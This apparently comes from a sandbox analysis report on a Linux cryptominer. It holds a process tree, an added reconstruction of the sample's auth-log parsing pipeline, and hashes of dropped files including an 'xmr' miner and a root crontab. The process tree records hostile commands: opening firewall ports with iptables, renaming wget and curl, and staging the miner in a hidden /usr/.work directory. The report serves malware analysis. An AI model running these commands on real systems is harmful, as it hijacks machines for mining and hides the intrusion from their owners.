                                                                                                                                                                                                                                                                                                                                      sh -c "iptables -I PREROUTING -t nat -p udp --dport 41736 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:1804
                                                                                                                                                                                                                                                                                                                                      • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                        getent passwd 0
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:1805
                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                          sh -c "iptables -I POSTROUTING -t nat -p udp --sport 41736 -j ACCEPT"
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                          PID:1806
                                                                                                                                                                                                                                                                                                                                        • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                          getent passwd 0
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:1817
                                                                                                                                                                                                                                                                                                                                          • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                            getent passwd 0
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:1818
                                                                                                                                                                                                                                                                                                                                            • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                              getent passwd 0
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:1824
                                                                                                                                                                                                                                                                                                                                              • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                                getent passwd 0
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1825
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/getent
                                                                                                                                                                                                                                                                                                                                                  getent passwd 0
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1826
                                                                                                                                                                                                                                                                                                                                              • /usr/bin/mv
                                                                                                                                                                                                                                                                                                                                                mv /usr/bin/wget /usr/bin/wget1
    1⤵
      PID:1747
  • /usr/bin/mv
    mv /usr/bin/curl /usr/bin/curl1
    1⤵
      PID:1749
  • /tmp/secure.sh
    /tmp/secure.sh
    1⤵
    • Executes dropped EXE
    PID:1761
    • /usr/bin/date
      date "+%b %e %H"
      2⤵
        PID:1766
    • /usr/bin/grep
      grep "Dec 3 23" /var/log/secure
      2⤵
        PID:1771
    • /usr/bin/grep
      grep Failed
      2⤵
        PID:1772
    • /usr/bin/awk
      awk "{print \$(NF-3)}"
      2⤵
        PID:1773
    • /usr/bin/sort
      sort
      2⤵
        PID:1774
    • /usr/bin/uniq
      uniq -c
      2⤵
        PID:1775
    • /usr/bin/awk
      awk "\$1>\"\$LIMIT\"{print \$1\":\"\$2}"
      2⤵
        PID:1776
    • /usr/bin/sleep
      sleep 60
      2⤵
        PID:1780
  • /tmp/auth.sh
    /tmp/auth.sh
    1⤵
    • Executes dropped EXE
    PID:1769
    • /usr/bin/date
      date "+%b %e %H"
      2⤵
        PID:1778
    • /usr/bin/grep
      grep "Dec 3 23" /var/log/auth.log
      2⤵
        PID:1784
    • /usr/bin/grep
      grep Failed
      2⤵
        PID:1785
    • /usr/bin/awk
      awk "{print \$(NF-3)}"
      2⤵
        PID:1786
    • /usr/bin/sort
      sort
      2⤵
        PID:1787
    • /usr/bin/uniq
      uniq -c
      2⤵
        PID:1788
    • /usr/bin/awk
      awk "\$1>\"\$LIMIT\"{print \$1\":\"\$2}"
      2⤵
        PID:1789
    • /usr/bin/sleep
      sleep 60
      2⤵
        PID:1792
  • /usr/bin/cp
    cp -R /tmp/auth.sh /tmp/config.json /tmp/gdm3-config-err-n2WIav /tmp/secure.sh /tmp/snap-private-tmp /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-ECrg2q /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar /tmp/work32 /tmp/xmr /usr/.work/
    1⤵
      PID:1782
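The two dropped scripts, /tmp/secure.sh and /tmp/auth.sh, run the same pipeline against the RHEL-style auth log (/var/log/secure, normally absent on the Ubuntu image used here) and the Debian/Ubuntu one (/var/log/auth.log): take the current hour from `date "+%b %e %H"`, keep that hour's lines containing "Failed", pull field NF-3 (the source address in both "Failed password for root from A.B.C.D port N ssh2" and the "invalid user" variant), count per address, print "count:address" for counts above a limit, then sleep 60. The shell example below is an added reconstruction of that pipeline, not code from the sample; it runs over a constructed sshd log excerpt and takes the hour string and limit as arguments instead of reading the clock. It keeps the final stage exactly as the process tree shows it: the second awk program still contains the literal text `$LIMIT` (the shell never expanded it, which is what happens when the awk program is written inside single quotes), so awk compares the count as a string against "$LIMIT", and since every digit sorts after "$", every address passes. The `intended_filter` function, which passes the limit into awk with `-v`, is an assumption about what the author meant, not something the report shows.

```shell
#!/bin/sh
# Added example (not code from the analysed sample): reconstruction of the
# secure.sh / auth.sh log pipeline seen in the process tree, run over a
# constructed sshd log excerpt so it executes offline.

# Constructed auth.log lines in syslog format; not taken from the sandbox run.
# In the "Dec  3 23" hour: three failures from 198.51.100.7, one from
# 192.0.2.44, one accepted login; plus one failure from the previous hour.
SAMPLE_LOG='Dec  3 22:59:58 host sshd[900]: Failed password for root from 203.0.113.5 port 40001 ssh2
Dec  3 23:01:02 host sshd[901]: Failed password for root from 198.51.100.7 port 40002 ssh2
Dec  3 23:01:05 host sshd[902]: Failed password for invalid user admin from 198.51.100.7 port 40003 ssh2
Dec  3 23:02:11 host sshd[903]: Failed password for root from 198.51.100.7 port 40004 ssh2
Dec  3 23:03:40 host sshd[904]: Accepted publickey for ubuntu from 192.0.2.9 port 40005 ssh2
Dec  3 23:04:00 host sshd[905]: Failed password for root from 192.0.2.44 port 40006 ssh2'

# Count "Failed" lines per source address for one hour: the first seven
# stages of the sample's pipeline. $1 is the hour string in the form produced
# by  date "+%b %e %H"  (%e space-pads the day, so the 3rd is "Dec  3 23",
# which is also how syslog writes the timestamp). $(NF-3) is the address in
# both "... for root from A.B.C.D port N ssh2" and
# "... for invalid user X from A.B.C.D port N ssh2".
failed_per_source() {
    printf '%s\n' "$SAMPLE_LOG" \
        | grep "$1" | grep Failed \
        | awk '{print $(NF-3)}' | sort | uniq -c
}

# The final stage as the process tree shows it. The awk program carries the
# literal text $LIMIT, so the count is compared as a STRING against "$LIMIT";
# every digit sorts after "$", so every address is printed as count:address.
observed_filter() {
    failed_per_source "$1" | awk '$1>"$LIMIT"{print $1":"$2}'
}

# The filter as presumably intended (assumption): the limit handed to awk
# with -v and compared numerically, so only addresses over it are printed.
intended_filter() {
    failed_per_source "$1" \
        | awk -v limit="$2" '$1+0 > limit+0 {print $1":"$2}'
}

# Stand-alone run; the sample would use "$(date '+%b %e %H')" for the hour.
echo "observed filter (no threshold takes effect):"
observed_filter 'Dec  3 23'
echo "intended filter, limit 2:"
intended_filter 'Dec  3 23' 2
```

Run against a real log by replacing `SAMPLE_LOG` with the file contents and passing `"$(date '+%b %e %H')"` as the hour; the point to notice is that `observed_filter` never drops anything, so whatever the sample does with its output downstream is applied to every address that failed at least once in the current hour.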

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/auth.sh
    Filesize
    419B
    MD5
    ed583c5e843c91d8fd0752e56ccacbde
    SHA1
    29ded7c69c93262842b8793d3a99868d8118364e
    SHA256

                                                                                                                                                                                                                                                                                                                                                                                            442e897c78532dd4e36fa1c7fd791c4bcf19b230d9aab3d5d12ade2d98b84a83

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            057e123d626a9cc2d5181707169e3636844856db721cd34d181712a16724538df4360d054af87b1b58505b78702fdce57836d340bab8af56c5173e9c0c735a5f

                                                                                                                                                                                                                                                                                                                                                                                          • /tmp/config.json

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            2a669d95673bc6d238399132dcf52e61

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            7497b198b549a139b3c32bffa65c3e15885b0ff2

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            b1a4c0d08ad2b8625e5a111ff70d88d0bcf4f7d712b5e7ab72747622431df18f

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            152285fd8f28c8dafd0dd3f2320b3258cbb6b621707de7486efdee710c7dcbb87fb716b181d3b4b1ac73376a3b4cb618d56d6a90213c5cbfa77a853fe9b60233

                                                                                                                                                                                                                                                                                                                                                                                          • /tmp/secure.sh

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            417B

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            b2c87016390044ebd32dcb8c52dfd8f3

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            5a246aa26f208d4c3d9f512e0f1777bc51cae68e

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            904f2c1bc6b48ba663b9186b7b04905a33af3d55afb9995802daadab83da2a15

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            9375bc9e0c0049baac8247a58526cc727e8452ec831e7abd39864a2de549cb36136ba2ff154428e2a9370ec7adfeda63d6d9bd9fa7158fc5eae852f8b035173e

                                                                                                                                                                                                                                                                                                                                                                                          • /tmp/xmr

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            20552242cd4b5e8fa6071951e9f4bf6d

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            95f8891ab0169ee8c51c39de0d3f0b974091e8fa

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            86f0e4c7596a7ac30af4152ce86268b109c325f62a7cfe1be0dbc72de0d9279a

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            1637b6742045baa9f8f16dbe5afa535324dec97abc3c5d37679c2ccca30f842ea80cbecb315925bcfce20f84dfdef4a7a978dc1986f26b9f9698665ef30e1c3a

                                                                                                                                                                                                                                                                                                                                                                                          • /usr/.work/work32

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            4.2MB

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            06e1f988471336d788da0fcaa29ed50b

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            2fa461cd8f0614dfb86f845aef47c42910370b00

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            7f28b2791ad94a202eea5e4c91d47cdeadca4723723427af574519f8aedbf15e

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            4ed849872ad844df311fa5e80246b143d76c1b0a432e9d38771e8a66fa42f71a683b52e41a8e3fbdd090152088c96176bdf6820478ceb5b5ab9f77284336b180

                                                                                                                                                                                                                                                                                                                                                                                          • /var/spool/cron/crontabs/root

                                                                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                                                                            34B

                                                                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                                                                            421de1a0dc2f268bd3aa5f563eff3901

                                                                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                                                                            eadf89c04673ae58d44bc8d02471c0fbf66e747e

                                                                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                                                                            888cf94f41403c7181b3ee7afb94278246f57b2d1b3cf078853d6ef447c2379a

                                                                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                                                                            7285223424cd7cebb5246c5f4410d4f43da83be4ed1870c9adcec58d6c650bb4d0044f806b99514f2651818cbc406479760747fcfe03c33b315d4f9a4b52d4b5